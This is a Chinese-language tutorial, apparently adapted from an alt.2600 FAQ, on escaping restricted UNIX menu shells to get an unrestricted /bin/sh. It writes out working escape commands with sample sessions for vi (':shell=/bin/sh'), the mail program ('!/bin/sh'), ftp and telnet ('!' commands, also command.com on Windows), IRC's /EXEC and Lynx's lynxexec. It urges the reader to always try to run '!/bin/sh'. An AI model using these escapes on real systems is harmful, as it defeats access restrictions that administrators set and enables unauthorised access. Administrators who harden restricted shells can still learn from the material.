如何突破一個有限制的SHELL 在菜單中得到SHELL用戶（UNIX）？ 1.1有權使用 &quot;vi&quot; 程序（來自ALT.2600問題解答) VI是一個強有力的文本編輯器，你可能有機會使用。你就有可能得到一個SHELL。 在VI狀態下輸入以下命令： :shell=/bin/sh 然後再運行SHELL這個命令： :shell 註釋： 如果你的SHELL被限制運行 &quot; CD &quot;命令，那麼請使用FTP來得到，這就可以了。 有權使用 &quot;mail&quot; 程序 如果你有權利使用 &quot;mail&quot; 程序來寫信請按照下面一步步做: 在菜單選項上運行&quot;mail&quot;程序。 實例： 1.Email (mail) <--------選擇這一項到 Email No mail for user1..... (他會自動地返回選項菜單) 所以在此之前，你要寫一封信給你自己 1.Email (mail) <--------選擇這一項到 Email Mail version ?. Type ? for help. &quot;/var/spool/mail/user1&quot;: 1 messages >; 1 ck@my.host.edu Thu Sep 1 1:11 1/99 &quot;test&quot; &amp; Ok,現在我們停留在 mail 的 &quot;&amp;&quot; 提示符下，那麼現在只需要輸入以下命令： &amp;!/bin/sh[回車] $ <------------ 終於不用再見到那該死的菜單了 ^_^ 註釋： 許多程序裡字符 &quot;!&quot; 可以直接制定和運行一個 SHELL 命令，在合式的一個場合中 你可以運行 &quot;/bin/sh&quot; 去得到一個 shell。 FTP and Telnet FTP and Telnet 他們同樣有能力在提示符下運用字符 &quot;!&quot; 來執行命令: ftp>; !ps <-------- !(command) PID TT STAT TIME COMMAND 2679 p2 S 0:01 -menu 2832 p2 R 0:00 ps telnet>;!ps PID TT STAT TIME COMMAND 2679 p2 S 0:01 -menu 2832 p2 R 0:00 ps 在一些用戶的初始配置文件裡，並不會為你配置所有命令的絕對路徑，那麼當你要運行一個程序 時，如果你的配置文件裡路徑查找不到它將不會執行。這個時候你就要輸入這個程序的絕對路 徑了。 實例： ftp>; !/usr/bin/ps PID TT STAT TIME COMMAND 2679 p2 S 0:01 -menu 2832 p2 R 0:00 ps ftp>; !/usr/bin/ps PID TT STAT TIME COMMAND 2679 p2 S 0:01 -menu 2832 p2 R 0:00 ps 註釋：無論何時都要設法執行 !/bin/sh 註釋： WIN95/98 AND NT： ftp>;!command.com Microsoft Microsoft Windows NT DOS Copyright Microsoft Corp 1990-1996. C:\>; IRC 如果有限制的 SHELL 菜單裡可以運行執行 IRC client (Internet Relay Chat) 當在登錄的時候，你可以執行任何命令 /EXEC (command) Lynx 可以使用以下命令 lynxexec and lynxprog: 實例: lynxexec:ls -l lynxprog:news lynxexec:/bin/sh 實例: lynx lynxexec://localhost/finger PS：如有出錯，請各位大客指出。 [ 關閉窗口 ]